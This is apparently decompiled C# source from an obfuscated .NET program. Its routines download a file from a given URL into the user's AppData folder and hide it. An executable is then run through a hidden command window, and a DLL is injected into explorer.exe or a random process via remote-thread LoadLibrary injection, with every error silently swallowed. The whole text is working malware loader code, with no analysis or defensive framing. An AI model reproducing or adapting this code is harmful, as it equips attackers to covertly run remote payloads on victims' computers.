// Token: 0x060001D3 RID: 467 RVA: 0x0000EB20 File Offset: 0x0000CD20 public static int smethod_1(string string_0, Process process_0) { IntPtr intptr_ = Class20.OpenProcess(1082, false, process_0.Id); IntPtr procAddress = Class20.GetProcAddress(Class20.GetModuleHandle("kernel32.dll"), "LoadLibraryA"); IntPtr intPtr = Class20.VirtualAllocEx(intptr_, IntPtr.Zero, (uint)((string_0.Length + 1) * Marshal.SizeOf(typeof(char))), 12288U, 4U); UIntPtr uintPtr; Class20.WriteProcessMemory(intptr_, intPtr, Encoding.Default.GetBytes(string_0), (uint)((string_0.Length + 1) * Marshal.SizeOf(typeof(char))), out uintPtr); Class20.CreateRemoteThread(intptr_, IntPtr.Zero, 0U, procAddress, intPtr, 0U, IntPtr.Zero); return(0); }
// Token: 0x060001DD RID: 477 RVA: 0x0000EC58 File Offset: 0x0000CE58 public static bool smethod_4() { if ((Environment.OSVersion.Version.Major == 5 && Environment.OSVersion.Version.Minor >= 1) || Environment.OSVersion.Version.Major >= 6) { bool result; using (Process currentProcess = Process.GetCurrentProcess()) { bool flag; if (!Class20.IsWow64Process(currentProcess.Handle, out flag)) { result = false; } else { result = flag; } } return(result); } return(false); }
// Token: 0x060001D4 RID: 468 RVA: 0x0000EBE0 File Offset: 0x0000CDE0 public static void smethod_2(string string_0) { try { Process process_; if (Process.GetProcessesByName("explorer").Length != 0) { process_ = Process.GetProcessesByName("explorer")[0]; } else { int maxValue = Process.GetProcesses().Length; int num = new Random().Next(1, maxValue); process_ = Process.GetProcesses()[num]; } Class20.smethod_1(string_0, process_); Class20.bool_0 = true; } catch { } }
// Token: 0x060001D2 RID: 466 RVA: 0x0000E950 File Offset: 0x0000CB50 public static void smethod_0(string string_0, string string_1) { string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); if (string_0 != "") { if (string_1.EndsWith(".exe")) { try { if (File.Exists(folderPath + "\\" + string_1)) { try { File.Delete(folderPath + "\\" + string_1); } catch { } } using (WebClient webClient = new WebClient()) { webClient.DownloadFile(string_0, folderPath + "\\" + string_1); } File.SetAttributes(folderPath + "\\" + string_1, FileAttributes.Hidden); string str = folderPath + "\\" + string_1; Process.Start(new ProcessStartInfo { UseShellExecute = true, WorkingDirectory = "C:\\Windows\\System32", FileName = "C:\\Windows\\System32\\cmd.exe", Arguments = "/c " + str, WindowStyle = ProcessWindowStyle.Hidden }); return; } catch { return; } } if (string_1.EndsWith(".dll")) { if (File.Exists(folderPath + "\\" + string_1)) { try { File.Delete(folderPath + "\\" + string_1); } catch { } } try { using (WebClient webClient2 = new WebClient()) { webClient2.DownloadFile(string_0, folderPath + "\\" + string_1); } File.SetAttributes(folderPath + "\\" + string_1, FileAttributes.Hidden); Class20.smethod_2(folderPath + "\\" + string_1); } catch { } } } }